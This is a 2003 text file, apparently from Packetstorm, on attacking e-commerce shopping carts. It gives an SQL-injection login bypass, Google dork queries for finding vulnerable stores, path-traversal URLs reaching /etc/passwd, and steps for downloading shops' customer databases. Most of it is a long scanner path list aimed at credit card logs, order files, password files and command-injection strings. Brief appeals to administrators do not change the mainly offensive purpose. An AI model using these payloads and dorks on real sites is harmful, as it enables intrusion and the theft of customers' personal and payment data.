Shopping Carts and Weak Security Explained by fris Written on December 22nd 2003, Merry Christmas Packetstorm Security. Lets go Through Some first Alabanza AlaCart Shopping Cart, this has a SQL Injection. When you access the admin section all you have to do is enter '=' for login and password and you have access to everything, and your whole company is vuln. How does a person find the admin section? Well simple. Ways around google. You could do a simple search for example inurl:s-cart/admin and results would come up. --- CommerceSQL Regarding: http://packetstormsecurity.nl/0311-exploits/commerceSQL.txt People using google again could do a simple search on inurl:admin/files/order.log CommerceSQL Proof of Concept as Follows: example: www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl example: http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi example: http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log --- Meta Cart: Meta Cart is a free Ecommerce Shopping Cart System based on ASP and SQL. the form where the database is located with the information is http://www.domain.com/database/metacart.mdb http://www.domain.com/metacart/database/metacart.mdb So yet again you could do a simple inurl:metacart.mdb in google and find results and just grab the access database and open it up in access and you have the companies information. This is why companies need to protect this data. Its a must for security reasons. All they would have to do is set the permissions on the database in the control panel in Information services, But admins are too lazy. They don't double check. So when Your folder is set to Write, Read and Execute. You know something is wrong. They should be set to Write and Execute for Anonymous so people Can't Download the database. Then rwx on the database itself so you can make changes of course. ---- SHOP.PL Vuln Yet another system that people are using against companies, to again access to their files and get data. Proof of concept. http://www.domain.com/cgi-local/shop.pl/page=shop.cfg is where the config file is located. http://www.domain.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd http://www.domain.com/cgi-local/shop.pl/page=./product_list and again you can do a simple search in google for inurl: shop.pl Windows Servers VULN, lazy admins: A way to get .mdb files (access databases) off ASP servers Search for shopdisplaycategories.asp inurl:shopdisplaycategories.asp plenty of sites use this, once you find some results change the site to. http://www.domain.com/shopdbtest.asp now you are in a section in the site which you get info where the mdb file is laying xDatabase: shopping and xDblocation:\shop_db now just put http://www.domain.com/shop_db/shopping.mdb Bascially you can download their Access database with their whole online shop, all there customer data, lazy admins that dont put the correct permissions will leave this open, but smart ones wont let you download the database. Other Key tricks: Going in google: search for "/cgi/shopper.cgi?" or for more results try "/cgi-bin/shopper.cgi?" ("shopcart.cgi" can also be used) find a site ("your shopping cart" or "Subtotal $0.00") and remove everything after shopper.cgi (the url should contain "/cgi/shopper.cgi?display=action" or "/cgi-bin/shopper.cgi?display=action" or possibly "checkout=action") add "?search=action&keywords=%20&template=order.log" to the url and /cgi-bin/shopper.cgi?search=action&keywords=apollos%2520&template=order.log /cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%20&template=order.log /cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%2520&template=shopper.conf /cgi-bin/shopper.cgi?search=action&keywords=powerd0wn%20&template=shopper.conf /cgi-bin/pdg_cart/shopper.conf /cgi-bin/products/loadpage.cgi?user_id=id&file=/orders.txt are some results to play with. Other Vuln's Using Google searching: inurl:shopping.mdb inurl:cart/cart.asp inurl:/productcart inurl:vti_inf.html inurl:service.pwd inurl:users.pwd inurl:authors.pwd inurl:administrators.pwd inurl:shtml.dll inurl:shtml.exe inurl:fpcount.exe inurl:default.asp inurl:showcode.asp inurl:sendmail.cfm inurl:getFile.cfm inurl:imagemap.exe inurl:test.bat inurl:msadcs.dll inurl:htimage.exe inurl:counter.exe inurl:browser.inc inurl:hello.bat inurl:default.asp\ inurl:dvwssr.dll inurl:cart32.exe inurl:add.exe inurl:index.jsp inurl:SessionServlet inurl:glimpse inurl:man.sh inurl:AT-admin.cgi inurl:AT-generate.cgi Once finding a site, you can use various scanners. WIN32 Scanners: http://packetstormsecurity.nl/UNIX/cgi-scanners/voideye.zip is a very good one. http://rhino.deny.de/ Triton Scanner http://www.ksoze.deny.de/ ksoze's Scanner http://wolfman.deny.de/ webshare scanner http://xtremet.deny.de/ cmx scanner http://www.accessdiver.com Accessdiver http://www.safety-lab.com you can get Shadow Security Scanner (shareware) UNIX: (opensource) http://packetstormsecurity.nl/UNIX/cgi-scanners/nikto-1.31.tar.gz All of these can load a path list, to test your vuln servers to do auditing, here is an updated list of security holes. against most of the shopping carts. Admins please protect your systems, You dont want your customers data at risk. --- Loadable List to test security: -- /store/log_files/your_order.log /cgi-bin/DCShop/Orders/orders.txt /vpasp/shopdbtest.asp /orders/checks.txt /WebShop/logs /ccbill/secure/ccbill.log /scripts/cart32.exe /cvv2.txt /cart/shopdbtest.asp /cgi-win/cart.pl /shopdbtest.asp /WebShop/logs/cc.txt /cgi-local/cart.pl /PDG_Cart/order.log /config/datasources/expire.mdb /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html /orders/orders.txt /cgis/cart.pl /webcart/carts /cgi-bin/cart32.exe/cart32clientlist /cgi/cart.pl /comersus/database/comersus.mdb /WebShop/templates/cc.txt /Admin_files/order.log /orders/mountain.cfg /cgi-sys/cart.pl /scripts/cart.pl /htbin/cart.pl /productcart/database/EIPC.mdb /shoponline/fpdb/shop.mdb /config/datasources/myorder.mdb /PDG_Cart/shopper.conf /shopping/database/metacart.mdb /bin/cart.pl /cgi-bin/cart32.ini /database/comersus.mdb /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt /cgi-bin/store/Admin_files/myorderlog.txt /cgi-bin/orders.txt /cgi-bin/store/Admin_files/your_order.log /test/test.txt /fpdb/shop.mdb /cgibin/shop/orders/orders.txt /shopadmin1.asp /cgi-bin/shop.cgi /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi /cgi-bin/PDG_cart/card.txt /shopper.cgi?preadd=action&key=PROFA&template=order1.log /store/shopdbtest.asp /log_files/your_order.log /_database/expire.mdb /HyperStat/stat_what.log /cgibin/DCShop/auth_data/auth_user_file.txt /htbin/orders/orders.txt /SHOP/shopadmin.asp /index.cgi?page=../admin/files/order.log /vpshop/shopadmin.asp /webcart/config /PDG/order.txt /cgi-bin/shopper.cgi /orders/order.log /orders/db/zzzbizorders.log.html /easylog/easylog.html /cgi-bin/store/Log_files/your_order.log /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb /comersus_message.asp? /orders/import.txt /htbin/DCShop/auth_data/auth_user_file.txt /admin/html_lib.pl /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt /cgi-bin/DCShop/auth_data/auth_user_file.txt /cgi-bin/shop.pl/page=;cat%20shop.pl /cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log /HBill/htpasswd /bin/shop/auth_data/auth_user_file.txt /cgi-bin/cs/shopdbtest.asp /mysql/shopping.mdb /Catalog/config/datasources/Products.mdb /trafficlog /cgi/orders/orders.txt /cgi-local/PDG_Cart/shopper.conf /store/cgi-bin/Admin_files/expire.mdb /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log /cgi-bin/mc.txt /cgi-bin/mall2000.cgi /cgi-win/DCShop/auth_data/auth_user_file.txt /cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log /store/commerce.cgi /scripts/shop/orders/orders.txt /product/shopping350.mdb /super_stats/access_logs /cgi-local/orders/orders.txt /cgi-bin/PDG_Cart/mc.txt /cgibin/cart32.exe /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log /cgibin/password.txt /Catalog/cart/carttrial.dat /catalog/Admin/Admin.asp /ecommerce/admin/user/admin.asp /data/productcart/database/EIPC.mdb /store/admin_files/commerce_user_lib.pl /cgi-bin/store/index.cgi /paynet.txt /config/datasources/store/billing.mdb /_database/shopping350.mdb /cgi-bin/shopper.exe?search /cgi/shop.pl/page=;cat%20shop.pl /cgi-bin/store/Admin_files/orders.txt /cgi-bin/store/commerce_user_lib.pl /cgi-sys/pagelog.cgi /cgi-sys/shop.pl/page=;cat%20shop.pl /scripts/weblog /fpdb/shopping400.mdb /htbin/shop/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log /mall_log_files/ /cgi-bin/perlshop.cgi /tienda/shopdbtest.asp /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log /WebShop/logs/ck.log /fpdb/shopping300.mdb /mysql/store.mdb /cgi-bin/store/Admin_files/commerce_user_lib.pl /config.dat /order/order.log /commerce_user_lib.pl /Admin_files/AuthorizeNet_user_lib.pl /cvv2.asp /cgi-bin/cart32/CART32-order.txt /wwwlog /cool-logs/mlog.html /cgi-bin/pass/merchant.cgi.log /cgi-local/pagelog.cgi /cgi-bin/pagelog.cgi /cgi-bin/orders/cc.txt /cgis/shop/orders/orders.txt /admin/admin_conf.pl /cgi-bin/pdg_cart/order.log /cgi/PDG_Cart/order.log /Admin_files/ccelog.txt /cgi-bin/orders/mc.txt /cgi/cart32.exe /ecommerce/admin/admin.asp /scripts/DCShop/auth_data/auth_user_file.txt /Catalog/config/datasources/Expire.mdb /ecommerce/admin/shopdbtest.asp /mysql/mystore.mdb /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log /cgi-bin/Count.cgi?df=callcard.dat /logfiles/ /shopping/shopping350.mdb /admin/configuration.pl /cgis/DCShop/auth_data/auth_user_file.txt /cgis/cart32.exe /cgi-bin/dcshop.cgi /cgi-win/shop/auth_data/auth_user_file.txt /shopping400.mdb /HBill/config /cgi-bin/shop/index.cgi?page=../admin/files/order.log /search=action&keywords=GSD%20&template=order.log /WebCart/orders.txt /PDG_Cart/authorizenets.txt /cgi-bin/AnyForm2 /~gcw/cgi-bin/Count.cgi?df=callcard.dat /cgi-bin/PDG_Cart/order.log /expire.mdb /logger/ /webcart-lite/orders/import.txt /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl /cgi-bin/PDG_Cart/shopper.conf /cgi-bin/cart32.exe /dc/orders/orders.txt /cgi-local/DCShop/orders/orders.txt /shop.pl/page=shop.cfg /cgi-local/cart32.exe /cgi-win/pagelog.cgi /cgi-win/shop/orders/orders.txt /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv /cgi-sys/DCShop/auth_data/auth_user_file.txt /cgi-bin/www-sql;;; /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log /scripts/orders/orders.txt /cgi-local/shop.pl/shop.cfg /search=action&keywords=cwtb%20&template=expire.mdb /php/mylog.phtml /config/datasources/shopping.mdb /php-coolfile/action.php?action=edit&file=config.php /cgi-bin/ezmall2000/mall2000.cgi /cgi/DCShop/orders/orders.txt /cgi-local/shop.pl /cgis/DCShop/orders/orders.txt /product/shopdbtest.asp /ASP/cart/database/metacart.mdb /cgi-bin/cgi-lib.pl /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html /search=action&keywords=cwtb%20&template=order.log /mysql/expire.mdb /scripts/shop/auth_data/auth_user_file.txt /cgi-bin/cart32/whatever-OUTPUT.txt /Shopping%20Cart/shopdbtest.asp /cgi/shop/auth_data/auth_user_file.txt /shop/shopping350.mdb /cgi-bin/store/Authorize_Net.pl /scripts/DCShop/orders/orders.txt /store/log_files/commerce_user_lib.pl /shopping/shopadmin.asp /cgi-bin/orderlog.txt /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;; /cool-logs/mylog.html /cgibin/shop.pl/page=;cat%20shop.pl /htbin/shop.pl/page=;cat%20shop.pl /cgi-win/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt /SHOP/shopdbtest.asp /cgi/pagelog.cgi /php/mlog.phtml /cgi-bin/shop/apdproducts.mdb /htbin/shop/auth_data/auth_user_file.txt /server%20logfile;;; /database/metacart.mdb /cgi-local/shop/orders/orders.txt /dcshop/auth_data/auth_user_file.txt /log/ /cgi-bin/shop.cgi/page=../../../../etc/hosts /scripts/c32web.exe /cgis/orders/orders.txt /logfile/ /shop_db/shopping.mdb /shopping.mdb /weblog/ /config/datasources/cvv2.mdb /cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log /cgi-sys/shop/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log /cgi-win/cart32.exe /cgi-bin/loadpage.cgi /dcshop/orders/orders.txt /shop/show.php?q=' /cgibin/orders/orders.txt /bin/pagelog.cgi /cgi-bin/shop/orders/orders.txt /_database/shopdbtest.asp /cgibin/pagelog.cgi /cgi-local/shop.pl/page=;cat%20shop.pl /shop/search.php?q=' /cgi-sys/cart32.exe /order13.txt /weblogs/ /orderb/shop.mdb /config/datasources/order.mdb /store/cgi-bin/Admin_files/Store_user_lib.pl /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC /Orders/order.log /logs/access_log /config/datasources/your_order.mdb /ecommerce/admin/admin/admin.asp /mall_log_files/order.log /bin/cart32.exe /htbin/DCShop/orders/orders.txt /Admin_files/Authorize_Net.pl /logging/ /database/ /cgi-sys/shop/auth_data/auth_user_file.txt /bin/shop.pl/page=;cat%20shop.pl /cgi-local/shop/auth_data/auth_user_file.txt /cgi-local/DCShop/auth_data/auth_user_file.txt /cgi-bin/shop/auth_data/auth_user_file.txt /cgi-win/DCShop/orders/orders.txt /store/Admin_files/Authorize_Net.pl /cart/cart.asp /bin/DCShop/orders/orders.txt /scripts/pagelog.cgi /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb /webcart/config/clients.txt /dc/auth_data/auth_user_file.txt /cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt /bin/orders/orders.txt /cgi-bin/Web_Store/web_store.cgi /cgis/pagelog.cgi /cgi-bin/orders/orders.txt /merchant/shopdbtest.asp /cgi-local/shop.pl/page=shop.cfg /cgis/shop.pl/page=;cat%20shop.pl /index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd /cg-bin/ /cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG /cgi-bin/DCShop/Auth_data/auth_user_file.txt /ecommerce/admin/adminLeft/admin.asp /webcart/orders/import.txt /cgibin/shop/auth_data/auth_user_file.txt /productcart/database/eipc.mdb /mysql/cheersoundchdb.mdb /cgi-bin/order.txt /scripts/iisadmin/tools/mkilog.exe /ProductCart/database/EIPC.mdb /databases/ /cgi-sys/orders/orders.txt /cgi/DCShop/auth_data/auth_user_file.txt /database/EIPC.mdb //cgi-bin/orders.txt /vpasp-shopcart/shopdbtest.asp /cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log /cgi-bin/DCShop/orders/orders.txt /mysql/shopping350.mdb /_database/shopping.mdb /htbin/cart32.exe /PDG_Cart/shopper.config /cgis/shop/auth_data/auth_user_file.txt /shop/SHOPDBTEST.ASP /bin/shop/orders/orders.txt //cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt /cgi-bin/store/dcshop_admin.cgi /_database/shopping400.mdb /scripts/shop.pl/page=;cat%20shop.pl /cgibin/PDG_Cart/shopper.conf /cgibin/DCShop/orders/orders.txt /cgibin/%20awstats.pl?output=keywords /cgi/shop/orders/orders.txt /cgi-bin/cart32_old.exe /webshop/templates/cc.txt /webcart/orders /productcart/database/shop.mdb /index.php?link=order /cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd /shopping/shopdisplayproducts.asp? /ccbill-local.cgi /bin/DCShop/auth_data/auth_user_file.txt /cgi-bin/c32web.exe/CheckError?error=53 /server/admin_files/commerce_user_lib.pl /shopping/shopdisplayproducts.asp?id=1&cat=order.log /mail.cgi /cgibin/admin_files/ /cgi-bin/mail/form.cgi /cgibin/shopping/database/metacart.mdb /globill/ver12otellog.txt /cgi-bin/shopping.mdb /shopping%20.mdb /cgi-bin/mail.cgi /cgi-bin/FORM.cgi /cgibin/shop/database/metacart.mdb /mail/form.cgi /cgibin/shop/shopping350.mdb /form.cgi /shopping/cgi-bin/cart32.ini /index.cgi?page=../../../../../../../../etc/passwd /cgi-bin/c32web.exe/ShowProgress /vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto /cgibin/orders.txt /cgibin/scripts/shop/shopping350.mdb /form/mail.cgi /cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd /webshop/logs/cc.txt /form/form.cgi /store/index.cgi?page=../../../../../../../../etc/passwd /cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail /cgibin/%20awstats.pl? /cgi-bin/Form.cgi /vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25 /admin.mdb /cgi-bin/cart32.exe/error /cgi/mail.cgi /cgi-bin/c32web.exe/ShowAdminDir /cgi-bin/csql/index.cgi?page=../admin/files/order.log /cgi-bin/admin_files/ /cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd /admins.asp /cgi-bin/cart_top /cgi-bin/mail/mail.cgi /shopadmin.asp /cgi-bin/order.log /mailform.pl /cgibin/admin.pl /vpasp/shopdisplayproducts.asp? /policies1.htm /cgi-bin/c32web_old.exe /cgi-bin/c32web.exe /cgi-bin/form/form.cgi /cgibin/metacart.mdb /shopdisplayproducts.asp /cgi-sys/DCShop/orders/orders.txt /ccbill6/secure/ /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0 /cgi-bin/ibill.log /ccbill6/ /password.txt /cgi-bin/PDG_cart/card /cgibin/www.google.com /honeymoonhideaway.htm+honeymoon+charleston /cgibin/awstats.pl%3Flang%3Dnl /cgibin/admin.pl?setpasswd /cgibin/awstats.pl%3Fyear%3D2003%26month%3D07 /cgibin/awstats.pl%3Fyear%3D2003%26month%3D08 /cgibin/awstats.pl%3Fyear%3D2003%26month%3D09 /cgibin/%20awstats.pl?output=keywords /shop/shopping450.mdb /ccbill6/secure/ccbill.log /cgibin/awstats.pl%3Flang%3Des%26update%3D1 /cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf /cgi-bin/form.cgi /M83A /cgibin/awstats.pl%3Fyear%3D2003%26month%3D11 /cgibin/amadmin.pl?setpasswd /cgi-bin/awstats.pl%3Flang%3Dit /orderdb/database/eipc.mdb /cg-bin//eshop/database/order.mdb /store/database/comersus.mdb /cgibin/password.mdb /~admin/guestbook /cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dnl /cgibin/%20awstats.pl?output=keywords /sumthin /cgibin/cgibin/%20awstats.pl?output=keywords /cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf /cgibin/productcart/database/eipc.mdb /cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde /mail/mail.cgi /cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl /cg/.%20/comersus/database/comersus.mdb /index%20of%20/%20productcart/database/eipc.mdb /scripts/nsiislog.dll /cgibin/order.cgi /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 /cgi-bin/awstats.pl%3Flang%3Dde /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0 /cgibinserver/admin_files/commerce_user_lib.pl /cgibin/store/Admin_files/myorderlog.txt //cgibin/orders.txt /cgibin/database/shopping.mdb /cgibin/shopping/shopadmin.asp /cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log /cgibin/shopper.exe?search=action&keywords=psiber&template=order.log /cgibin/allmanageup.pl /cgi-win/shop.pl/page=;cat%20shop.pl /eshop/database/log.mdb /cgibin/awsta /cgibin/nph-proxy.pl /cgibin/awstats.pl%3Flang%3Dnl%26update%3D1 //config/datasources/expire.mdb /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des /cgibin/ccbill/password/.htpasswd /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08 /cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases /eshop/en/database/credit.mdb /cgi-bin/pdg_cart/shopper.conf /password.mdb /data/verotellog.txt /cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1 /productcart/eipc.mdb /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11 /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit /index%20of%20/webshop/templates/cc.txt /cartdb/database/eipc.mdb /cgi-bin/eshop/database/order.mdb /cgibin//fpdb/shopping400.mdb /cgibin/order.txt /cgi-bin/cart32.exe/expdate%20algunas%20veces /cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords /cgibin/database/comersus.mdb /cgi-bin/awstats.pl%3Flang%3Des /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr /globill/ /cgibin/fpdb/shopping400.mdb /cgibin/perl.exe /eshop/en/database/log.mdb /cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log /cg/comersus/database/comersus.mdb /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07 /cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail /cgibin/admin.mdb /cgi-bin/whereami.cgi?g=ls /cgibin/xxxhu /cgibin/cartserver/admin_files/commerce_user_lib.pl /cgibin/%20awstats.pl?output=keywords /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr /robot.txt /cgi-bin/form/mail.cgi /ibill/mypins/ /cgi-bin/awstats.pl%3Flang%3Dnl /cgibin/allmanage_admin.pl /cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords /cg-ibin/admin_files/ /cgibin/cart/comersus.mdb /cg-bin/eshop/database/order.mdb /cgibin/htt /cgibin/phf /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den /database/eipc.mdb /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 /script/shop/shopping350.mdb /cgibin/shopping350.mdb /cg-bin/eshop/en/database/credit.mdb /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den /cgi-bin/add-passwd.cgi /logs/200306/charleston.com/ /random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la| /cgibin/store/log_files/your_order.log /cgibin/shopper.exe?search=action&keywords=psiber&template=neworder.log /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09 /cgibin/awstats.pl%3Flang%3Dfr%26update%3D1 /cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1 /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl /cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail /cgibin/mailform.pl /cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords /cgi-bin/shop/shopping350.mdb /cgibin/cart/database/comersus.mdb /dbase/date. /www.gambling-01.co.uk/cgibin/password.txt /cgibin/awstats.pl%3Flang%3Des /ccbill/ccbill.log /cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde /productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit /cgibin/index%20of /cgi-bin/form1.cgi /cc.txt /cgibin/awstats.pl%3Flang%3Den%26update%3D1 /cg/./comersus/database/comersus.mdb /cgi-bin/awstats.pl%3Foutput%3Dkeyphrases /cgibin/webshop/templates/cc.txt /....../ all /....../config.sys /....../etc/hosts /../../../../ all /../../../../../../../boot.ini /../../../../../winnt/repair/sam._ /../../../../config.sys /../../../../etc/hosts /.access /.bash_history /.htaccess /.html/............./config.sys /.htpasswd /.passwd /ASPSamp/AdvWorks/equipment/catalog_type.asp /Admin_files/order.log /AdvWorks/equipment/catalog_type.asp /Orders/order.log /PDG_Cart/order.log /PDG_Cart/shopper.conf /PSUser/PSCOErrPage.htm /WebShop/logs/cc.txt /WebShop/logs/ck.log /WebShop/templates/cc.txt /_private /_vti_bin/_vti_aut/dvwssr.dll /_vti_bin/fpcount.exe /_vti_inf.html /_vti_pvt /_vti_pvt/administrators.pwd /_vti_pvt/authors.pwd /_vti_pvt/service.pwd /_vti_pvt/shtml.dll /_vti_pvt/shtml.exe /_vti_pvt/users.pwd /adsamples/config/site.csc /bin /carbo.dll /ccbill/secure/ccbill.log /cfdocs/cfmlsyntaxcheck.cfm /cfdocs/exampleapp/docs/sourcewindow.cfm /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini /cfdocs/expelval/displayopenedfile.cfm /cfdocs/expelval/exprcalc.cfm /cfdocs/expelval/openfile.cfm /cfdocs/expelval/sendmail.cfm /cfdocs/snippets/fileexists.cfm /cfdocs/snippets/viewexample.cfm /cgi /cgi-bin /cgi-bin/AT-admin.cgi /cgi-bin/AT-generate.cgi /cgi-bin/Admin_files/order.log /cgi-bin/AnyForm2 /cgi-bin/Cgitest.exe /cgi-bin/Count.cgi /cgi-bin/FormHandler.cgi /cgi-bin/GW5/GWWEB.EXE /cgi-bin/UltraBoard.cgi /cgi-bin/UltraBoard.pl /cgi-bin/add_ftp.cgi /cgi-bin/adp /cgi-bin/adpassword.txt /cgi-bin/ads.setup /cgi-bin/aglimpse /cgi-bin/alibaba.pl /cgi-bin/allmanage.pl /cgi-bin/allmanage/adp /cgi-bin/allmanage/k /cgi-bin/allmanage/settings.cfg /cgi-bin/allmanage/userfile.dat /cgi-bin/allmanageup.pl /cgi-bin/anyboard.cgi /cgi-bin/architext_query.pl /cgi-bin/authorize/dbmfiles/users /cgi-bin/ax-admin.cgi /cgi-bin/ax.cgi /cgi-bin/bigconf.cgi all /cgi-bin/bizdb1-search.cgi /cgi-bin/bnbform.cgi /cgi-bin/cachemgr.cgi /cgi-bin/calender.pl /cgi-bin/calender_admin.pl /cgi-bin/campas /cgi-bin/cart.pl /cgi-bin/cgiwrap /cgi-bin/classifieds.cgi /cgi-bin/clickresponder.pl /cgi-bin/cmd.exe /cgi-bin/counterfiglet /cgi-bin/dbmlparser.exe /cgi-bin/dig.cgi /cgi-bin/dnewsweb /cgi-bin/edit.pl /cgi-bin/environ.cgi /cgi-bin/excite /cgi-bin/faxsurvey /cgi-bin/filemail.pl /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/finger.pl /cgi-bin/formmail.pl /cgi-bin/fpcount.exe /cgi-bin/fpexplore.exe /cgi-bin/gH.cgi /cgi-bin/get32.exe /cgi-bin/glimpse /cgi-bin/guestbook.cgi /cgi-bin/handler /cgi-bin/htimage.exe /cgi-bin/htmlscript /cgi-bin/htsearch /cgi-bin/htsearch /cgi-bin/iisadmpwd/achg.htr /cgi-bin/iisadmpwd/aexp.htr /cgi-bin/iisadmpwd/aexp2.htr /cgi-bin/iisadmpwd/anot.htr /cgi-bin/imagemap.exe /cgi-bin/info2www /cgi-bin/infosrch.cgi /cgi-bin/input.bat /cgi-bin/input2.bat /cgi-bin/jj /cgi-bin/k /cgi-bin/loadpage.cgi /cgi-bin/mailform.exe /cgi-bin/maillist.pl /cgi-bin/makechanges/easysteps/easysteps.pl /cgi-bin/man.sh /cgi-bin/netstat /cgi-bin/nph-publish /cgi-bin/nph-test-cgi /cgi-bin/passwd /cgi-bin/passwd.txt /cgi-bin/perl.exe /cgi-bin/perlshop.cgi /cgi-bin/pfdispaly.cgi /cgi-bin/pfdisplay /cgi-bin/pfdisplay.cgi /cgi-bin/phf /cgi-bin/php.cgi /cgi-bin/plusmail /cgi-bin/postcard.pl /cgi-bin/printenv /cgi-bin/process_bug.cgi /cgi-bin/query /cgi-bin/responder /cgi-bin/rguest.exe /cgi-bin/rpm_query /cgi-bin/rwwwshell.pl /cgi-bin/search.cgi /cgi-bin/settings.cfg /cgi-bin/sojourn /cgi-bin/survey.cgi /cgi-bin/test-cgi /cgi-bin/test.bat /cgi-bin/textcounter.pl /cgi-bin/tpgnrock /cgi-bin/tst.bat /cgi-bin/tst.bat /cgi-bin/unlg1.1 /cgi-bin/unlg1.2 /cgi-bin/userfile.dat /cgi-bin/view-source /cgi-bin/visadmin.exe /cgi-bin/w3-msql/ /cgi-bin/webbbs.cgi /cgi-bin/webdist.cgi /cgi-bin/webplus /cgi-bin/websendmail /cgi-bin/webwho.pl /cgi-bin/wguest.exe /cgi-bin/whois_raw.cgi /cgi-bin/windmail.exe /cgi-bin/wrap /cgi-bin/www-sql /cgi-bin/wwwadmin.pl /cgi-bin/wwwboard.pl /cgi-dos/args.bat /cgi-dos/args.cmd /cgi-local /cgi-shl/win-c-sample.exe /cgi-src /cgi-src/phf.c /cgi-win /cgi-win/uploader.exe /cgibin /com1 /com2 /com3 /com4 /con/con /config/checks.txt /config/import.txt /config/mountain.cfg /config/orders.txt /default.asp. /default.asp::$DATA /doc /iisadmpwd/aexp2.htr /iishelp/iis/misc/iirturnh.htw /iissamples/exair/howitworks/codebrws.asp /iissamples/exair/search/advsearch.asp /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /iissamples/iissamples/query.asp /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/sdk/asp/docs/codebrws.asp /log /logs /mall_log_files/order.log /manage/cgi/cgiproc /msadc/Samples/SELECTOR/showcode.asp /msadc/msadcs.dll 